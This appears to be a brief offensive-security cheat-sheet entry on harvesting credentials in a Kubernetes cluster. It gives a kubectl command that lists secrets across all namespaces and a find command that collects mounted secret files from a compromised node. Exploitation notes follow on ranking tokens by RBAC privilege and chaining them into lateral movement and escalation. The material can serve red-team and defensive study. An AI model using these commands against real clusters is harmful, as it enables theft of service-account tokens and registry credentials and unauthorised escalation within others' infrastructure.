Credentials are scattered across a cluster: every pod mounts a service-account token, secrets hold application and registry credentials, and a node materializes the secrets of every pod it runs. Sweeping them up yields the identities to move laterally and escalate.
# From API access: read secrets and token-type secrets
kubectl get secrets -A -o json | jq -r '.items[]|.metadata.namespace+"/"+.metadata.name+" "+.type'
# From a node foothold: every mounted secret on the node
find /var/lib/kubelet/pods -path '*volumes/kubernetes.io~secret/*' -type f 2>/dev/null
Exploitation notes#
- A node holds the secrets of all pods scheduled on it, so one node foothold often harvests many identities at once.
- Prioritize tokens whose service accounts hold broad RBAC; test each with
auth can-i --list. - Feed the strongest token into Service account token to API and the registry creds into image access.